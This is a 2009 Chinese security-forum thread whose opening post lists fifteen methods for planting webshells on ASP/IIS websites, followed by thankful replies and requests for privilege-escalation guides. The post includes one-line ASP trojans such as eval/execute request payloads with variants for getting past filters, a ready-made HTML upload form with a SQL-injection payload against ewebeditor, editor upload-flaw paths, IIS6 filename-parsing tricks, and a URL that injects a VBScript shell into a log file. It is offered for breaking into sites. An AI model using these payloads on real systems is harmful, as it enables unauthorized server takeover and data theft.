标题:
[原创文章]
asp拿shell
[打印本页]
作者:
yyw258520
时间:
2009-9-21 09:24
标题:
asp拿shell
1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
6 u0 J% H. C4 H! h
$ `! u( e: n; I' Z! D1 T5 U
2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试<%eval request("value")%>来突破,例如config.asp
0 R* Z6 G* B/ [8 o8 @* u
! J; n# [& }" Y ]8 V
3.上传漏洞:
' @% Q( K4 N7 _
. \* v- W5 i) M) O) ?
动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00
; k( e" c8 }( x* W
8 U0 B1 {+ I' J; q: I) A& j
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件
/ I; G0 q% w6 p& {
4 A. B( j+ E- q: ]3 `
雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp
k. t& y5 l1 j8 y: P4 \
然后在上传文件里面填要传的图片格式的ASP木马
2 s) h# f" b% I6 I8 @- F
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp
7 v2 T( s6 q0 c) b# i p1 k9 O
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
) W! W0 n: U' _" }! q* T
5 M/ E% {$ E" ^2 _) J# s
<html>
' T1 R$ G6 {1 m8 P7 F0 e
<head>
( }7 Z' N, ?2 G: y O
<title>ewebeditor upload.asp上传利用</title>
+ i4 s# f4 A# h \! @' T$ H
</head>
; A, x5 ?2 O7 h. P
<body>
& }( K- E6 W8 g: B
<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
9 t Y# b2 `" z
<input type=file name=uploadfile size=100><br><br>
; \, P8 X5 y( x1 @
<input type=submit value=Fuck>
. N# x9 ~% k6 x* c% w; |4 i
</form>
: z- t7 A1 U3 T7 d6 p
</body>
- |- g, s0 _2 [
</form>
' R* ^8 w( C5 M$ P* H
</html>
+ t B) a; Z4 t; i$ U2 Z
4 E! d5 @, |& {
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问
, Q# }& x% U( l) T
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
c; H* @, ]$ b
3 C, i% A; D/ T) F: ?! X0 n. U
利用windows2003解析。建立zjq.asp的文件夹
4 l4 y _, y( `% b
6 J# S+ W N; _/ P: ^
6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型
1 m$ O1 Z8 W9 g# s3 C
/ b% y& A& a* l, E+ r) a
7.cuteeditor:类似ewebeditor
9 j- K: B4 O. J8 b$ I+ ~- ~$ A
% a! E9 i& l5 W4 J* U2 e7 o( z# R L
8.htmleditor:同上
- c1 F, r) s! V. b5 \. F
( a* C' I$ o. ]
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
4 \8 Y$ E# \6 I1 d8 w$ U& }9 }$ X
6 J& K* E/ m$ j2 Q8 S
<%execute request("value")%><%'<% loop <%:%>
5 i; C; _+ q& Y; h, G% B
6 b# b9 ~$ T+ h4 E+ s( W c
<%'<% loop <%:%><%execute request("value")%>
6 ~) U- q0 C# n: @
) B1 d& V- U& T4 u6 k3 O- V2 g2 ~& f
<%execute request("value")'<% loop <%:%>
* E1 X# p/ L, i- Q, n* ?
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞
- v# J9 S! T4 A/ T8 X; F
* z7 }( x: w, n" c
10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞
|6 V* S6 k9 } a& [/ A
2 Z. \8 K6 f# ?& q7 B( c
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
) m6 S0 L7 T8 F4 G, y; s! X4 ?
% {5 u/ S' f4 l( K
解析漏洞得到webshell
+ B7 f; A" `# a; f$ F' {; w# P+ }
2 e/ a I; ^. K
12.mssql差异备份,日志备份,前提需知道web路径
( Y5 [, A( F8 \/ u
4 G: a( s( H1 Y/ w: C
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell
2 K2 E4 u7 K* L3 j5 d
. o3 x0 t& M# k' `5 B
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell
9 `& A. I9 C/ A
$ e/ Q& M+ A8 U. E3 N
15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以
www.xx.com/
*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
7 m: S" L- z0 E1 E2 `
4 o8 y+ t8 b+ x* m* r; W+ a/ M
以上只是本人的一些拙见,并不完善,以后想到了再继续添加
3 D, q. E+ x: ]
不是我原创。我的朋友,飞鸟游鱼原创的
作者:
超超
时间:
2009-9-21 23:54
好东西能分享 谢谢!!!
作者:
zhaojunnt
时间:
2009-9-23 09:42
kankankankan
作者:
1335csy
时间:
2009-9-24 02:21
写的很不错
作者:
394931603
时间:
2009-9-25 14:56
1#
yyw258520
& H/ c3 S7 n( c) @9 m
% Y4 _- N5 n7 t1 t9 J0 \ l) C
/ Q" Q) K& D+ O, e7 \$ l e
很好啊、基本的入侵方法都包含了
5 n& `: A; s: J" z
0 S, c. d- W y* U$ g
最好来个提权的帖子再。
) J, `& k, \- f- h5 x x
3 V' q( C9 q1 R/ ^. a" o" u
不要网上百度的。
作者:
NotFree
时间:
2009-9-26 11:54
提权才是王道。
作者:
qdboy2007
时间:
2009-10-2 09:48
不错哦 呵呵 学习了
作者:
在意z
时间:
2012-5-16 00:17
谢谢楼主分享技术。。。
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2